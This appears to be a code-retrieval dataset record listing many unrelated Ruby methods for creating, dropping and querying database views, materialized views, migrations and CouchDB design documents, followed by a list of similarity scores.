"def drop_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::DropView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n options = env.options\n materialized = options[:materialized] ? 'MATERIALIZED' : ''\n sql = \"DROP #{materialized} VIEW\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def drop_view(name, **kwargs)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n execute build_drop_view_query(name, **kwargs)\n end",
"def views(stream)\n # Don't create \"system\" views.\n view_names = PgSaurus::Tools.views\n view_names.each do |options|\n write_view_definition(stream,\n options[\"table_schema\"],\n options[\"table_name\"],\n options[\"view_definition\"])\n end\n stream << \"\\n\"\n end",
"def drop_materialized_view(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP MATERIALIZED VIEW '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |v| quote_view_name(v) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def view(name, opts = {})\n design_doc.create_view(name, opts)\n end",
"def views(opts=OPTS)\n relkind = opts[:materialized] ? 'm' : 'v'\n pg_class_relname(relkind, opts)\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def view_select_statement(view, name=nil)\n raise NotImplementedError, \"view_select_statement is an abstract method\"\n end",
"def create_extension_view_and_class\n self.const_get(\"Extended#{to_s}\")\n rescue\n clause = view_builder\n #this needs to be moved into the specific db adapter files\n connection.execute %{\n create or replace algorithm = merge SQL SECURITY DEFINER view #{extended_table_name} as select #{clause[:view_select]} from #{table_name} #{clause[:view_joins]}#{clause[:view_conditions]}\n }\n class_eval %{\n class Extended#{to_s} < #{to_s}\n set_table_name \"#{extended_table_name}\"\n def self.descends_from_active_record?\n true\n end\n end\n }\n true\n end",
"def table_or_view\n return unless Admin::MigrationGenerator.table_or_view_exists? table_name\n\n return :table if Admin::MigrationGenerator.table_exists? table_name\n\n :view\n end",
"def quote_table_or_view(name, options)\n schema = options[:schema]\n if schema\n \"\\\"#{schema}\\\".\\\"#{name}\\\"\"\n else\n \"\\\"#{name}\\\"\"\n end\n end",
"def views(opts=OPTS, &block)\n tables_or_views('VIEW', opts, &block)\n end",
"def drop_materialized_view(name, **kwargs)\n supports_materialized_view!\n\n execute build_drop_materialized_view_query(name, **kwargs)\n end",
"def materialized_views(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def alter_materialized_view_owner(name, role, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :owner_to => role\n }, options).to_sql\n end",
"def alter_materialized_view_schema(name, schema, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_schema => schema\n }, options).to_sql\n end",
"def create_view(id,doc)\n resp = get_design_doc(id)\n ddoc = set_views(resp,doc)\n\n create_design_doc(id,ddoc)\n end",
"def show_create_table(db, table)\n end",
"def parse_ddl(name, &block) \n Rubyrel::DDL.schema(name, &block)\n end",
"def define(design_doc, name, opts = {})\n model = design_doc.model\n\n # Is this an all view?\n if name.to_s == 'all'\n opts[:map] = <<-EOF\n function(doc) {\n if (doc['#{model.model_type_key}'] == '#{model.to_s}') {\n emit(doc._id, null);\n }\n }\n EOF\n elsif !opts[:map]\n if opts[:by].nil? && name.to_s =~ /^by_(.+)/\n opts[:by] = $1.split(/_and_/)\n end\n raise \"View cannot be created without recognised name, :map or :by options\" if opts[:by].nil?\n\n opts[:allow_blank] = opts[:allow_blank].nil? ? true : opts[:allow_blank]\n opts[:guards] ||= []\n opts[:guards].push \"(doc['#{model.model_type_key}'] == '#{model.to_s}')\"\n\n keys = opts[:by].map{|o| \"doc['#{o}']\"}\n emit = keys.length == 1 ? keys.first : \"[#{keys.join(', ')}]\"\n opts[:guards] += keys.map{|k| \"(#{k} != null)\"} unless opts[:allow_nil]\n opts[:guards] += keys.map{|k| \"(#{k} != '')\"} unless opts[:allow_blank]\n opts[:map] = <<-EOF\n function(doc) {\n if (#{opts[:guards].join(' && ')}) {\n emit(#{emit}, 1);\n }\n }\n EOF\n if opts[:reduce].nil?\n # Use built-in sum function by default\n opts[:reduce] = \"_sum\"\n end\n end\n\n if opts[:reduce].is_a?(Symbol)\n # Assume calling a built in method, convert to a string\n opts[:reduce] = \"_#{opts[:reduce]}\"\n end\n\n design_doc['views'] ||= {}\n view = design_doc['views'][name.to_s] = { }\n view['map'] = opts[:map]\n view['reduce'] = opts[:reduce] if opts[:reduce]\n view\n end",
"def create_view(name, opts = {})\n Designs::View.define_and_create(self, name, opts)\n end",
"def create_tbilisi_districts(month)\n vl_name = \"#{@year} #{month} voters list\"\n view_name = \"#{vl_name} - #{@shapes[:tbilisi_district]}\"\n @client.query(\"drop view if exists `#{view_name}`\")\n sql = \"create view `#{view_name}` as\n select `region` AS `region`,\n `district_id` AS `district_id`,\n `district_name` AS `district_name`,\n avg(`avg_age`) AS `avg_age`,\n sum(`greater_99`) AS `greater_99`,\n sum(`85_99`) AS `85_99`,\n sum(`less_than_85`) AS `less_than_85`,\n sum(`no_birthdate`) AS `no_birthdate`,\n sum(`total_voters`) AS `total_voters`,\n sum(`duplicates`) AS `duplicates`\n from `#{vl_name} - raw`\n where (`district_id` between 1 and 22)\n group by `region`, `district_id`, `district_name`\n order by `district_id`\"\n\n results = @client.query(sql)\nend",
"def create_view(db)\n begin\n db.get('_design/todos')\n rescue RestClient::ResourceNotFound => nfe\n db.save_doc({\n \"_id\" => \"_design/todos\",\n :views => {\n :allTodos => {\n :reduce => \"_count\",\n :map => \"function(doc){if(doc.name != null){emit(doc.order,{name: doc.name})}}\"\n }\n }\n })\n end\n end",
"def finviz_view_type\n 411\n end",
"def overview(db)\n\toverview = db.execute(\"CREATE VIEW [Your top books!] AS SELECT book_name, author FROM books where rating > 3\")\n\treturn overview\nend",
"def test_materialized_view_metadata_drop\n skip(\"Materialized views were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.test (pk int PRIMARY KEY, c int)\")\n @session.execute(\"CREATE MATERIALIZED VIEW simplex.mv1 AS SELECT c,pk FROM simplex.test WHERE c IS NOT NULL AND pk IS NOT NULL PRIMARY KEY (pk, c)\")\n\n @listener.wait_for_materialized_view('simplex', 'mv1')\n assert @cluster.keyspace('simplex').has_materialized_view?('mv1')\n\n @session.execute(\"DROP MATERIALIZED VIEW simplex.mv1\")\n @cluster.refresh_schema\n refute @cluster.keyspace('simplex').has_materialized_view?('mv1')\n end",
"def view(ddoc,view,*opts)\n q = \"#{database}/_design/#{ddoc}/_view/#{view}\"\n q << build_query_string(opts.first,\"view\") if opts && opts.any? && opts.first.is_a?(Hash)\n\n @conn.query({url_path: q, method: :get})\n end",
"def drop_views name, defs=nil\n defs = defs.delete(:dependent_views) if defs.is_a?(Hash)\n defs.each do |dependent_view|\n execute \"DROP VIEW IF EXISTS #{dependent_view}\"\n end if defs\n \n execute \"DROP VIEW IF EXISTS #{name}\"\n\n end",
"def scaffold_name_sql\n scaffold_auto_complete_options[:sql_name]\n end",
"def materialize_view(name, sql)\n unless @enduser\n raise Empire::MissingEnduserError.new\n end\n path = \"view/#{name}\"\n data = {'query' => sql}\n request path, :put, {}, data\n end",
"def view_name=(view_name)\n Domgen.error(\"sql.view_name= invoked on entity #{entity.qualified_name} with no subtypes\") if entity.direct_subtypes.size == 0\n @view_name = view_name\n end",
"def do_query_view(view_name, view_options)\n database.view \"#{self.name.underscore}/#{view_name}\", view_options\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def create_view(view_name, map_function, reduce_function = nil)\n design_doc = database.get \"_design/#{self.name.underscore}\" rescue nil\n if design_doc\n design_doc[\"views\"][view_name] = {:map => map_function, :reduce => reduce_function}\n else\n design_doc = {\n \"_id\" => \"_design/#{self.name.underscore}\",\n :views => {\n view_name => {\n :map => map_function,\n :reduce => reduce_function\n }\n }\n }\n end\n database.save(design_doc)\n end",
"def alter_materialized_view_set_options(name, set_options, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_options => set_options\n }, options).to_sql\n end",
"def create_full_rst_tbl(preserve_null_pk = true)\n unless defined? @full_rst_tbl\n self.all_cols_select\n self.pk_full_list\n if preserve_null_pk\n renamed_pk_col = @pk_full_list.map { |pk| \"#{pk['col']} as #{pk['alias']}_pk\" }.join(', ')\n else\n renamed_pk_col = @pk_full_list.map do |pk|\n pkcol = @all_cols.find{|col| col.colname == pk['colname'] and col.relname==pk['relname']}\n \"COALESCE(#{pk['col']},#{pkcol.null_replacement}) as #{pk['alias']}_pk\"\n end.join(',')\n end\n targetListReplacement = \"#{renamed_pk_col},#{@all_cols_select}\"\n query = ReverseParseTree.reverseAndreplace(@parseTree, targetListReplacement, '')\n @full_rst_tbl = \"#{@table}_full_rst\"\n pk = @pk_full_list.map { |pk| \"#{pk['alias']}_pk\" }.join(', ')\n # binding.pry\n DBConn.tblCreation(@full_rst_tbl, pk, query)\n\n # unless preserve_null_pk\n # DBConn.update_null_columns(@full_rst_tbl,pk)\n # end\n # if is_plain_query()\n # query = QueryBuilder.create_tbl(@full_rst_tbl, pk, query)\n # DBConn.exec(query)\n # else\n # query = QueryBuilder.create_tbl(@full_rst_tbl, '', query)\n # DBConn.exec(query)\n\n # # not_null_query = pk_list.flat.map{|pk| \"#{pk} is not null\"}.join(' AND ')\n # # add index on not null columns\n # pk_not_null = @pk_full_list.map { |pk| \"#{pk['alias']}_pk is not null\"}.join(' OR ')\n # create_indx = \"CREATE UNIQUE INDEX idx_#{@full_rst_tbl} on #{@full_rst_tbl} (#{pk}) where #{pk_not_null}\"\n # pp create_indx\n # DBConn.exec(create_indx)\n\n # end\n end\n return @full_rst_tbl\n end",
"def compile!(view); end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def schema_generator_script(schema_name, mode = 'create', owner: DefaultSchemaOwner)\n cname = \"#{mode}_#{schema_name}_schema_#{migration_version}\".camelize\n\n <<~CONTENT\n require 'active_record/migration/app_generator'\n class #{cname} < ActiveRecord::Migration[5.2]\n include ActiveRecord::Migration::AppGenerator\n\n def change\n self.schema = '#{schema_name}'\n self.owner = '#{owner}'\n create_schema\n end\n end\n CONTENT\n end",
"def migration\n migration_template 'migration.rb', 'db/migrate/create_seo_landing_pages.rb'\n end",
"def drop_view(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n names.each do |n|\n execute_ddl(drop_view_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def generate_views\n Views.new(cli: cli, app_path: app_path).generate\n end",
"def views(name = nil)\n select_values(\"SELECT table_name FROM information_schema.views\", name)\n end",
"def migration_template\n 'rails31_migration.rb.erb'\n end",
"def define_view\n \t#puts \"#{controller_name}.define_view:begin view=#{@myparams[:view_id]}\"\n \t# views: liste des vues possibles est utilisee dans la view ruby show\n\t\t@views = View.all\n\t\t# view_id: id de la vue selectionnee est utilisee dans la view ruby show\n\t\t#@myparams[:view_id] = @views.first.id if @myparams[:view_id].nil?\n\t\tif @myparams[:view_id].nil?\n\t\t\tif logged_in?\n\t\t\t@myparams[:view_id] = current_user.get_default_view.id\n\t\t\tend\n\t\tend\n\t\t#puts \"#{controller_name}.define_view:end view=#{@myparams[:view_id]}\"\n\tend",
"def generate_view_models\n file_name = class_name.underscore\n \n create_model class_name, file_name\n \n create_views file_name if options.views.present?\n end",
"def generate_migration_body(tables)\n current_tables, new_tables = table_names(tables).partition do |table_name| \n @db_table_names.include?(table_name)\n end\n\n add_line \"change do\"\n create_new_tables(new_tables, tables)\n alter_tables(current_tables, tables)\n add_line \"end\"\n end",
"def create_analysis_views\n puts \"====================\"\n puts \"creating analysis views for #{self.name}\"\n puts \"====================\"\n\n run_analysis_views\n\n puts \"> done\"\n puts \"====================\"\n end",
"def get_ddl(cfg)\n <<-EOS\n CREATE TABLE operations (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(100) NOT NULL,\n txid VARCHAR(100) NOT NULL,\n amount DECIMAL(16,8) NOT NULL,\n block_height INTEGER NOT NULL,\n block_hash VARCHAR(100) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`),\n KEY `idx_txid` (`txid`),\n UNIQUE KEY `idx_address_txid` (`address`, `txid`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n CREATE TABLE addresses (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(255) DEFAULT NULL,\n total_received DECIMAL(16,8) DEFAULT NULL,\n balance DECIMAL(16,9) DEFAULT NULL,\n n_tx INTEGER NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n EOS\n end",
"def scaffold_auto_complete_name_sql\n scaffold_auto_complete_options[:sql_name]\n end",
"def add_view_code\n return '' if (data = @record.send(@yaml['name'])).blank?\n\n table, form_name = @yaml['view'].split(/\\ |\\,/).delete_if { |e| e.blank? }\n url = @parent.url_for(controller: 'cmsedit', id: data, action: :edit, table: table, form_name: form_name, readonly: true, window_close: 1 )\n icon = @parent.mi_icon('eye-o md-18')\n %(<span class=\"dc-window-open\" data-url=\"#{url}\"> #{icon}</span>)\nend",
"def create_analysis_tables_and_views\n puts \"====================\"\n puts \"creating analysis tables and views for #{self.name}\"\n puts \"====================\"\n\n run_analysis_tables\n run_analysis_views\n\n puts \"> done\"\n puts \"====================\"\n end",
"def table_or_view_comment\n ActiveRecord::Base.connection.schema_cache.clear!\n if self.class.view_exists?(table_name)\n res = self.class.connection.execute \"select obj_description('#{table_name}'::regclass) c\"\n res[0]['c']\n else\n ActiveRecord::Base.connection.table_comment(table_name)\n end\n rescue StandardError\n nil\n end",
"def refresh_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::RefreshView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n sql = \"REFRESH MATERIALIZED VIEW #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"../../migration/templates/create_table_migration.rb\", File.join(db_migrate_path, \"create_#{table_name}.rb\")\n end",
"def create_tbilisi_precincts(month)\n vl_name = \"#{@year} #{month} voters list\"\n view_name = \"#{vl_name} - #{@shapes[:tbilisi_precinct]}\"\n @client.query(\"drop view if exists `#{view_name}`\")\n sql = \"create view `#{view_name}` as\n select `region` AS `region`,\n `district_id` AS `district_id`,\n `district_name` AS `district_name`,\n `precinct_id` AS `precinct_id`,\n concat(cast(`district_id` as char charset utf8),\n '.',\n cast(`precinct_id` as char charset utf8)) AS `precinct_name`,\n `prec_id_from_data` AS `prec_id_from_data`,\n `avg_age` AS `avg_age`,\n `greater_99` AS `greater_99`,\n `85_99` AS `85_99`,\n `less_than_85` AS `less_than_85`,\n `no_birthdate` AS `no_birthdate`,\n `total_voters` AS `total_voters`,\n `duplicates` AS `duplicates`\n from `#{vl_name} - raw`\n where (`district_id` between 1 and 22)\n order by `district_id`\"\n\n results = @client.query(sql)\nend",
"def OLDview_data db, sql, options\n outputfile = options[:output_to]\n formatting = options[:formatting]\n headers = options[:headers]\n #str = db.get_data sql\n rs = db.execute_query sql\n str = rs.content\n columns = rs.columns\n #puts \"SQL: #{sql}.\\nstr: #{str.size}\"\n data = []\n if headers\n data << columns.join(\"\\t\")\n end\n str.each {|line| data << line.join(\"\\t\"); }\n #puts \"Rows: #{data.size}\"\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n headerstr=nil\n if formatting\n headerstr = \"-H\" unless headers\n # sometimes this can be slow, and it can fault on UTF-8 chars\n system(\"cat #{filename} | term-table.rb #{headerstr} | sponge #{filename}\")\n end\n if outputfile\n #puts \"comes here\"\n system(\"cp #{filename} #{outputfile}\")\n filename = outputfile\n end\n system \"wc -l #{filename}\" if $opt_debug\n \n #system \"$EDITOR #{filename}\"\n system \"vim -c ':set nowrap' #{filename}\"\n tmpfile.close\n tmpfile.unlink\nend",
"def create_migration_file\r\n migration_template 'migration.rb', 'db/migrate/create_baby_dove_model_data.rb'\r\n end",
"def create_views file_name\n %W(list_item main_item).each do |view|\n create_file \"app/views/#{file_name.pluralize}/_#{view}.html.#{options.views.downcase}\", File.read(File.join(File.expand_path('../templates', __FILE__), \"/views/_empty.html.#{options.views.downcase}\"))\n end\n \n # Copy collection views.\n #\n %W(collection list pagination table).each do |view|\n create_file \"app/views/#{file_name.pluralize}/_#{view}.html.#{options.views.downcase}\", File.read(File.join(File.expand_path('../templates', __FILE__), \"/views/_#{view}.html.#{options.views.downcase}\"))\n end\n end",
"def rename_materialized_view(name, new_name, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :rename_to => new_name\n }, options).to_sql\n end",
"def scaffold_views\n #%w(list show new edit)\n %w(list show)\n end",
"def transitions\n\t\tadd(\"start\",0)\n\t\tadd(\"CREATE\",1)\n\t\tadd(\"TABLE\",2)\n\t\tadd(\"TableName\",3)\n\t\tadd(\"(\",4)\n\t\tadd(\"COLUMN_NAME\",5)\n\t\tadd(\"COLUMN_TYPE\",6)\n\t\tadd(\"COLUMN_CONSTRAINTS\",7)\n\t\tadd(\"TABLE_CONSTRAINTS\",8)\n\t\tadd(\");\",9)\n\tend",
"def add_view(kind, template)\n id = \"#{kind}.view\"\n transitions = {\n edit: \"#{kind}.update\",\n list: \"#{kind}.list\",\n delete: \"#{kind}.list\",\n }\n add_display(View.new(kind, id, template, transitions))\n end",
"def view_flow; end",
"def get_views\n connect_db.fetch(\"SELECT RDB$RELATION_NAME, RDB$VIEW_SOURCE FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NOT NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)\")\n end",
"def view(name, opts = {})\n View.create(model, name, opts)\n create_view_method(name)\n end",
"def construct_view()\n design_docs = [\"couchdb_views/content_views.json\"]\n design_docs.each { |design_doc|\n #Read the file\n content = File.read(Pathname.new(File.dirname(__FILE__) + \"/../../\" + design_doc).cleanpath)\n check_sum = generateCheckSum(content)\n \n #create the JSON\n design_doc_as_json = JSON.parse(content)\n design_doc_as_json[:content_hash] = check_sum\n \n #upload the JSON as a design document\n upsert_doc(@db, design_doc_as_json, design_doc_as_json, :content_hash, @log)\n }\n end",
"def copy_view_files #do NOT change the name of this method \n # it must be overriding an existing one in a parent class\n base_path = File.join(\"app/views\", class_path, file_name)\n #binding.pry\n empty_directory base_path\n @actions = actions.nil? || actions.empty? ? %w(index new create edit update destroy) : actions\n @attr_cols = GeneratorUtils::attr_cols(table_name)\n @col_count = @attr_cols.count\n @col_count += 1 if @actions.include?(\"edit\")\n @col_count += 1 if @actions.include?(\"destroy\")\n @search_sort = options.search_sort?\n (@actions - %w(create update destroy)).each do |action|\n @action = action\n formats.each do |format|\n @path = File.join(base_path, filename_with_extensions(action, format))\n set_template(@action, @path)\n end\n end\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def generateColumnDef()\n res=@conn.exec(\"select tablename from pg_tables where schemaname='public'\")\n classObj = \"\"\n for i in res\n classObj = classObj + \"\\n\\n\\n== \"+ i[0].to_s + \"\\n\"\n classObj = classObj + genrateTabledesc(i[0].to_s)\n classObj = classObj + \"\\n\"\n classObj = classObj + \".Properties\\n\"\n classObj = classObj + \"[frame=\\\"none\\\",options=\\\"header\\\"]\\n\"\n classObj = classObj + \"|======================================================================================\\n\"\n classObj = classObj + \"| | Data Type | Description \\n\"\n classObj = classObj + self.singleTableColDef(i.to_s)\n classObj = classObj + \"|======================================================================================\\n\"\n classObj = classObj + \"=== Links\\n\"\n classObj = classObj + self.generateForeignKeyDef(i.to_s)\n classObj = classObj + \"=== Methods\\n\"\n classObj = classObj + self.generateStoredProcDef(i.to_s)\n end\n puts classObj\n return classObj\n end",
"def banner\n \"Usage: #{$0} mwd_scaffold ModelName [field:type, field:type]\"\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end"
] |
[
"0.76422477",
"0.7080754",
"0.69882655",
"0.6876096",
"0.6707558",
"0.6691078",
"0.66169316",
"0.6589881",
"0.65825975",
"0.6561772",
"0.6553956",
"0.638153",
"0.6370509",
"0.6340597",
"0.62826496",
"0.6160476",
"0.615917",
"0.61341274",
"0.601144",
"0.5997561",
"0.5932272",
"0.58937454",
"0.5822132",
"0.5817782",
"0.5786249",
"0.57848305",
"0.576502",
"0.5748557",
"0.57372665",
"0.5705269",
"0.5699654",
"0.5659555",
"0.56329834",
"0.5610649",
"0.56082505",
"0.5600662",
"0.5591573",
"0.5585946",
"0.5565684",
"0.5525851",
"0.55146056",
"0.5498873",
"0.54977584",
"0.5484769",
"0.5483056",
"0.54603225",
"0.5458453",
"0.5453181",
"0.54364073",
"0.54339236",
"0.5423974",
"0.5423192",
"0.54192466",
"0.5414576",
"0.54019946",
"0.53930527",
"0.5380233",
"0.5372001",
"0.53178596",
"0.5299678",
"0.5296617",
"0.5294676",
"0.52921164",
"0.5291724",
"0.52909493",
"0.52822745",
"0.52763325",
"0.5264283",
"0.5260967",
"0.525575",
"0.52510566",
"0.5248561",
"0.52371216",
"0.5236617",
"0.523631",
"0.5225148",
"0.52174073",
"0.5190193",
"0.51762414",
"0.51684934",
"0.5167292",
"0.51632345",
"0.5142389",
"0.51410514",
"0.51410043",
"0.5138868",
"0.513568",
"0.51271325",
"0.51213574",
"0.51170903",
"0.51125133",
"0.51114047",
"0.5110269",
"0.5089899",
"0.5082506",
"0.50600713",
"0.50536555",
"0.5032642",
"0.50317705",
"0.50286794"
] |
0.7618731
|
1
|
SQL for dropping a function from the database.
|
def drop_function_sql(name, opts=OPTS)
  "DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}"
end
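
For reference, a runnable sketch of the statements this helper produces; the sql_function_args helper and OPTS constant below are assumed stand-ins, with argument rendering simplified for the sketch:

# Illustration only: a stand-in sql_function_args so the builder runs standalone.
class DropFunctionSketch
  OPTS = {}.freeze

  # Renders "(type1, type2)" when argument types are given, nothing otherwise.
  def sql_function_args(args)
    args ? "(#{Array(args).join(', ')})" : ''
  end

  def drop_function_sql(name, opts = OPTS)
    "DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}"
  end
end

sketch = DropFunctionSketch.new
puts sketch.drop_function_sql(:set_updated_at)
# => DROP FUNCTION set_updated_at
puts sketch.drop_function_sql(:set_updated_at, if_exists: true, args: [:integer, :text], cascade: true)
# => DROP FUNCTION IF EXISTS set_updated_at(integer, text) CASCADE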
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_function(function_name, options)\n\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def db_remove\n \"DELETE\" + from_table_where + sql_match_conditions\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def to_maql_drop\n maql = \"\"\n [ attributes, facts ].each do |obj|\n maql += obj.to_maql_drop\n end\n maql += \"DROP {#{self.identifier}};\\n\"\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
